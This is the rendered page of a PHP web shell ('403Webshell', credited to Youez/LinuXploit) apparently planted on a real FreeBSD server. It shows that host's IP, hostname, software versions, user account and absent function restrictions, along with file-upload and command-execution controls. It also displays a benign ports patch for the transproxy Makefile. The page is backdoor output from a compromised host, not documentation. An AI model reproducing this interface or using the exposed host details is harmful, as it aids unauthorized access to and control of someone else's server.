403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/transproxy/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/transproxy/files/patch-Makefile
--- Makefile.orig	2004-03-31 12:19:34 UTC
+++ Makefile
@@ -64,17 +64,17 @@ OPTIONS += -DIPTABLES
 #OPTIONS += -DHAVE_GETOPT_H
 
 # You may need to touch PREFIX, CC and CFLAGS.
-PREFIX = /usr/local
-INSTALL_PROGRAM = install -c -m 555 -o bin -g bin
-INSTALL_MAN = install -c -m 444 -o bin -g bin
+#PREFIX = /usr/local
+#INSTALL_PROGRAM = install -c -m 555 -o bin -g bin
+#INSTALL_MAN = install -c -m 444 -o bin -g bin
 
 # Some make's don't define this.
-RM      = rm -f
+#RM      = rm -f
 
 # Should be OK for GNU gcc.
-CC      = gcc
-CFLAGS  = -O2 -Wall
-LDFLAGS = -s
+#CC      = gcc
+#CFLAGS  = -O2 -Wall
+#LDFLAGS = -s
 
 # For using BIND resolver instead of system resolver.
 #LIBS    += -lresolv	# Really old Linux has this.
@@ -103,7 +103,7 @@ clobber dist-clean:	clean
 	$(RM) tproxy
 
 install:	tproxy
-	$(INSTALL_PROGRAM) tproxy $(PREFIX)/sbin
-	$(INSTALL_PROGRAM) tproxyrun $(PREFIX)/sbin
-	$(INSTALL_PROGRAM) tproxywatch $(PREFIX)/sbin
-	$(INSTALL_MAN) tproxy.8 $(PREFIX)/man/man8
+	$(BSD_INSTALL_PROGRAM) tproxy $(DESTDIR)/$(PREFIX)/sbin
+	$(BSD_INSTALL_SCRIPT) tproxyrun $(DESTDIR)$(PREFIX)/sbin
+	$(BSD_INSTALL_SCRIPT) tproxywatch $(DESTDIR)$(PREFIX)/sbin
+	$(BSD_INSTALL_MAN) tproxy.8 $(DESTDIR)/$(PREFIX)/man/man8

Youez - 2016 - github.com/yon3zu
LinuXploit